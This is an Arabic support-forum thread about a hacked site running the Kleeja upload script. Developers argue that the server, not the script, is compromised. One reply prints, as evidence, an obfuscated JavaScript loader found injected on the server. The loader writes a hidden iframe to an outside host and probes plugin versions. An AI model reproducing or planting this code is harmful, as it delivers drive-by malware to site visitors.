موقعي سهل الاختراق رغم اني نفذت جميع ما يلزم /،

لدعم سكربت التحميل كليجا .. kleeja
قوانين المنتدى
- لطرح اخطاء برمجيه بالسكربت قم بالذهاب لمركز اخطاء كليجا :!: .
-قناة كليجا على تويتر :).
-تنبيه/ قبل تحديث او ترقيه او عمل تغيير بكليجا تفضل هنا
أضف رد جديد
noure12
عضو جديد
مشاركات: 48
اشترك في: 25 يناير 2010, 04:40

موقعي سهل الاختراق رغم اني نفذت جميع ما يلزم /،

مشاركة بواسطة noure12 »

اخواني انا سديت جميع الثغرات الموجودة بالموضوع المتبث في الاصدار التطويري

هناك هاكرز زارع اكواد بقاعدة البيانات يمكن

كلما اعمل تحديث يرجع الموقع بعدين اجد انه قاعدته مفعلة بملف الكونفق رغم اني مغير تسميته

والفى المركز واقف ،،
أعلى
phpfalcon
بـــدر
مشاركات: 565
اشترك في: 26 فبراير 2009, 03:56

رد: موقعي سهل الاختراق رغم اني نفذت جميع ما يلزم /،

مشاركة بواسطة phpfalcon »

لايوجد ثغرات بكليجا
أعلى
noure12
عضو جديد
مشاركات: 48
اشترك في: 25 يناير 2010, 04:40

رد: موقعي سهل الاختراق رغم اني نفذت جميع ما يلزم /،

مشاركة بواسطة noure12 »

يالحبيب انا اقول لك موقعي يخترق ويتغير ملف الكونفق رغم اني مغير اسمه والقواعد تغير كليا وتقولي ما في ثغرات بالسكريبت ،،
أعلى
Ra3eeha
عضو جديد
مشاركات: 54
اشترك في: 11 يونيو 2009, 00:39
اتصال:
اتصل بـ Ra3eeha

رد: موقعي سهل الاختراق رغم اني نفذت جميع ما يلزم /،

مشاركة بواسطة Ra3eeha »

السلام عليكم ,,

اهلين اخوي noure12 يعطيك العافيه على جهدك وتركيب كليجا ..

اخوي الشرح الي سويته في الموضوع المثبت لزيادة الحماية فقط وليس سد الثغرات !!!

كليجا خالية من الثغرات تماماً .. والاختراق تم عن طريق السيرفر وليس عن طريق السكربت !!!
بعدين اجد انه قاعدته مفعلة بملف الكونفق


ما فهمت عليك ؟؟؟
أعلى
saanina
عبدالرحمــــن
مشاركات: 3762
اشترك في: 30 أغسطس 2004, 13:54

رد: موقعي سهل الاختراق رغم اني نفذت جميع ما يلزم /،

مشاركة بواسطة saanina »

noure12 كتب:يالحبيب انا اقول لك موقعي يخترق ويتغير ملف الكونفق رغم اني مغير اسمه والقواعد تغير كليا وتقولي ما في ثغرات بالسكريبت ،،
انت كذا جاي تهاوش مو تطلب دعم :mrgreen:
عموما لو صارت المشكله من كليجا فلن ننكر وسنصدر تحديث .. لكن شكل الخادم عندك فاتحه مخيم ومسوي عزيمه
أعلى
Tar3Q
ابو زياد
مشاركات: 1178
اشترك في: 25 فبراير 2009, 01:09

رد: موقعي سهل الاختراق رغم اني نفذت جميع ما يلزم /،

مشاركة بواسطة Tar3Q »

لكن شكل الخادم عندك فاتحه مخيم ومسوي عزيمه
:lol:

اكيد يا دحمي لو كان السبب كليجا أنا اول من يعرف :mrgreen:

يا الحبيب سيرفرك ملغم والدومينات اللي عليه مصابة بالسبام وقوقل حاجبها

كود: تحديد الكل

    
        Reported Attack Page!
      
          This web page at  has been reported as an attack page and has been blocked based on your security preferences.
           initPage();

هذي رسالة القوقل وبرضه دخلت احد الدومينات على السيرفر حصلته ملغم بكود جافا سكربت مشفر

كود: تحديد الكل

function kn21(zf8){return zf8.replace(/%/g,'').replace(/[lvH'Io]/g,Dy58)}
zRbo='do6fcH75menI74.wI72v69o74l65(o22I3cH64H69l76 styv6ceo3dI5cI22po6fH73itiv6fnl3aabH73I6fI6cutev3b v6cl65o66to3aH2d10l300pxH3b tv6fpl3aI2d1000pxI3bl5cl22v3eH22)H3bo66o75nctiH6fn v69H373(a)I7bH64o6fcumo65ntH2ev77l72v69I74e(I22v3ciframo65 srcI3dv5cl22httpI3aH2fl2fo6dariv73I6bao6cI72H6fcv6b.cH6fmv2fwebcH61o6dH2fimgradI69I6f.pI68I70I3fso3dMOdpjo4fv4fv4emo26io64H3dl22+av2bo22o5cH22H3eI3cv2fifI72amel3eo22)l3bI7djfnc4I3dH30I3bfl75nctiv6fn n73(v61)v7bI76ar k,sH2civ3bif(v6eaI76il67ato6fr.miI6deo54I79pes.v6cengthH26l26(kl3dnao76iv67atl6fr.po6cv75giI6ev73))fH6fro28iv3d0v3bio3co6b.o6cl65ngtH68v3biv2b+H29v7bv73I3dkv5biv5d.namo65l3bv69fo28sI2eindexOfo28a)H3eo3d0l29returl6e kH5bil5dH3bI7dreturn 0I3bo7dH6aI66v6ec4o3d0o3bTYFl75H3d0v3bfuI6eI63tI69o6fH6e s73(a)H7bil66o28v61I5b0v5dl3dv3dH39H29v7bTYv46uo3dI61v5b2H5dv3c12o34l3bjfo6ec4I3d(al5bl32H5dv3e16)l26v26v28H61v5b2I5dI3c2o346)v3bo7deo6cse if(aH5b0l5dH3dH3d10)jfI6ecI34v3do61I5b2l5do3c23l3bjfnc4o3djfnv63I34I26I26(I6eav76igatI6fr.userAgent.tv6fLI6fwerCase().inl64eH78Of(H22H73al66ariI22)I3do3do2d1)H3bI7dl69f((xo3dnv373(l22o46o6cashl22)I29v26I26(l78l3dxv2edescrio70tiv6fI6e))s73(x.repv6cace(H2f(v5baI2dzAH2dZo5dv7cv5cs)+I2fl2cH22H22).H72epI6cI61ce(v2f(o5cH73+rI7cH5cs+bl5b0v2do39I5d+)o2f,l22l2el22).sH70I6cl69t(I22.H22H29)o3bev6cseI20tryI7bs7I33I28(neH77 I41ctio76l65XObv6aeo63t(o22H53hI6fckl77v61H76eFv6cao73hI2eShH6fl63l6bwao76eFl6cashI22))I2eGetVario61bl6ce(l22o24I76H65rso69l6fnl22).spv6ciI74o28H22 l22)v5b1I5d.spH6cl69H74l28v22,H22)o29v3bI7dcI61to63h(ev29v7bl7do69f(To59Fu)i7l33(3)o3bdH6fcuml65nv74.write(o22o3cv2fI64o69H76v3eI22l29v3b';
rJ8=2;try{if(Dy58='a')throw new TypeError(rJ8);}catch(rJ8){Dy58=unescape('%'+kn21(rJ8.message+5));Dy58=kn21(zRbo);kn21=eval}kn21(unescape(Dy58));
فك التشفير وتعرف على من قام بحقنه في نظامك ..

العجيب انه كليجا تعمل وسط هذا الزحام واتوقع انه كلامك عن تغيير بيانات الكونفق ورجوع المخترق مرة ثانية هذا اذا افترضنا أنك تسمي هجوم شركات السبام على انه اختراق واعتقد انه ليس باختراق ولكنه مجرد تلغيم لأي قاعدة بيانات متواجدة بالسيرفر وهذا يحدث فقط بفعل أنظمة السبام المتطورة .. لذلك اذهب لحل مشكلتك ولا تتهم كليجا مع علمك أنه تم فحص نظام كليجا اكثر من مرة ومن خبرات متعددة في مجالات كثيرة وكانت النتيجة ان كليجا حتى الآن خالية من اي ثغرات او مقدمات للثغرات وقد أعجب الكثير الكود البرمجي لإختصاره ونظافته وذكاء المطور المنطقي باقفاله جميع الطرق المؤدية للاختراق .. لذا لا اسمح لأي كائن أن يتهم كليجا بانها السبب باختراقه وثق تماماً انني لا أنفي احتمال حدوث ثغرة في نظام كليجا فهذا هو حال جميع الانظمة في جميع العالم ولكن أجزم لك ولغيرك لو حدث ذلك لاعترفنا به واصدرنا التحديث الامني بشكل عاجل ..
أعلى
أضف رد جديد

العودة إلى ”دعم سكربت كليجا kleeja“